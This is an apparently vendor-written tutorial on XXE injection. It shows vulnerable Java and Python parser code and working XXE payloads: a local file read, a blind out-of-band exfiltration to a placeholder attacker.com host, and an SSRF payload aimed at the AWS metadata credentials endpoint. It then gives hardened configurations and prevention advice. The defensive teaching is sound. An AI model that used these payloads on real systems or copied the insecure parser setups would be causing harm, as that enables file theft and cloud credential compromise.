What XXE Is
XML External Entity (XXE) injection is a vulnerability in applications that parse XML input. The XML specification includes a feature called "external entities" β a way to reference content from an external source (a URL or local file path) and include it inline in the document. When an XML parser processes attacker-controlled XML and external entity processing is enabled, the attacker can use this feature to read local files, trigger server-side requests, and in some cases exfiltrate data out of band.
The vulnerability exists because enabling external entity processing is often the default behaviour of XML parsers, not a feature you have to opt into. Developers working with XML rarely think about it β they're focused on parsing the data, not on what the parser does with DOCTYPE declarations.
OWASP history: XXE was its own category (A04) in the OWASP Top 10 2017. In 2021 it was merged into Security Misconfiguration (A05), reflecting that XXE is fundamentally a case of an insecurely configured parser.
How XXE Attacks Work
XML documents can include a DOCTYPE declaration that defines entities β essentially named variables you can reference in the document body. External entities reference content from a URI:
<!-- XXE payload β defines an external entity pointing to a local file --> <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <data>&xxe;</data> </root>
When an insecure parser processes this, it fetches the contents of /etc/passwd and substitutes it as the value of &xxe;. If the application echoes back the parsed value in the response, the attacker sees the file contents directly.
Classic File Read Attack
Here's what a vulnerable Java endpoint looks like β and what an attacker sends to it:
import javax.xml.parsers.*; import org.w3c.dom.*; // Vulnerable β uses default DocumentBuilderFactory with external entities enabled public Document parseXml(InputStream input) throws Exception { DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // Missing: feature flags to disable external entities DocumentBuilder db = dbf.newDocumentBuilder(); return db.parse(input); }
from lxml import etree # Vulnerable β lxml with resolve_entities=True (non-default but sometimes set) def parse_xml(xml_input: bytes): parser = etree.XMLParser(resolve_entities=True) return etree.fromstring(xml_input, parser) # Also vulnerable β stdlib xml.etree.ElementTree is safe by default # but xml.sax and xml.dom.minidom are NOT β they process external entities import xml.sax # xml.sax.parseString(attacker_xml, handler) <-- vulnerable
We've seen this in SOAP services: Legacy Java SOAP endpoints are a hotspot for XXE. The WSDL-generated code often uses the default DocumentBuilderFactory, and nobody has updated it since the service was written in 2012. If your org has old Java web services, they're worth auditing first.
Blind XXE via DNS Exfiltration
Often the application doesn't echo back the parsed XML β but XXE can still be exploited using out-of-band techniques. The attacker references an external URI under their control and uses DNS lookups to exfiltrate data:
<!-- Blind XXE β exfiltrates data via DNS lookup -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM
'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
]>
<root><data>test</data></root>The attacker watches their DNS server logs for incoming queries. The hostname value gets encoded into the subdomain of the request. No response body needed from the app β the data arrives out of band.
XXE to SSRF
Instead of using a file:// URL, the attacker can use http:// URLs to trigger server-side requests. This turns XXE into SSRF β the server fetches attacker-specified internal URLs:
<!-- XXE as SSRF β scans internal network / hits metadata service --> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]> <root><data>&xxe;</data></root>
On AWS, this hits the EC2 instance metadata service and can retrieve IAM credentials attached to the instance. Combined with verbose responses, this is a full cloud credential compromise.
Which Languages and Parsers Are Vulnerable
External entity processing is a parser-level feature, so the vulnerability depends on which parser you use and how it's configured:
- Java:
DocumentBuilderFactory,SAXParserFactory,XMLInputFactoryβ all enable external entities by default - Python:
xml.saxandxml.dom.minidomare vulnerable;xml.etree.ElementTreeandlxml(with default settings) are safe - PHP:
simplexml_load_string(),DOMDocumentβ vulnerable by default in older PHP versions - Node.js:
libxmljswithnoent: trueis vulnerable; most Node XML parsers are safer by default - .NET:
XmlDocumentandXmlTextReaderβ vulnerable in some configurations prior to .NET 4.5.2
SVG uploads are an XXE vector: SVG files are XML. If your app accepts SVG uploads and parses them server-side (for preview generation, sanitisation, etc.) without disabling external entities, it's vulnerable to XXE from uploaded files. This catches a lot of teams off guard.
How to Disable External Entity Processing
// Fixed Java β disable all external entity features DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); dbf.setXIncludeAware(false); dbf.setExpandEntityReferences(false); DocumentBuilder db = dbf.newDocumentBuilder(); Document doc = db.parse(input);
from lxml import etree from defusedxml import ElementTree # Option 1: Use defusedxml β drop-in safe replacement for stdlib XML tree = ElementTree.fromstring(xml_input) # Option 2: lxml with safe parser config parser = etree.XMLParser( resolve_entities=False, no_network=True, load_dtd=False, ) root = etree.fromstring(xml_input, parser)
defusedxml for Python: The defusedxml library wraps Python's XML parsers and disables all known attack vectors by default β XXE, billion laughs, quadratic blowup. It's a drop-in replacement for xml.etree.ElementTree, xml.sax, etc. Just install and swap the import.
Detecting XXE with SAST
XXE is a good candidate for SAST because the vulnerability is about parser configuration β detectable code patterns rather than runtime behaviour. SAST tools look for:
- Use of
DocumentBuilderFactory,SAXParserFactory, orXMLInputFactorywithout the hardening feature flags xml.sax.parseString()orxml.dom.minidom.parseString()calls withoutdefusedxml- PHP's
simplexml_load_string()orDOMDocument->loadXML()without LIBXML_NOENT disabled - SVG or document upload handling that routes to XML parsing without validation
Prevention Checklist
- Disable DOCTYPE declarations entirely β if your XML doesn't use DTDs, block them at the parser level
- Disable external general and parameter entities β use the feature flags for your language's parser
- Use defusedxml in Python β it handles all the edge cases
- Use simpler data formats β if JSON works for your use case, use JSON; it doesn't have this class of problem
- Treat SVG uploads as XML β parse them with a hardened parser or sanitise server-side
- Run SAST in CI β catch unsafe parser instantiation before code ships
- Network-level controls as defence in depth β block outbound HTTP/DNS from app servers where possible to limit out-of-band exfiltration
Find XXE Vulnerabilities in Your Codebase
AquilaX SAST detects insecure XML parser configurations across Java, Python, PHP, and Node.js β catching XXE before it ships to production.
Start Free Scan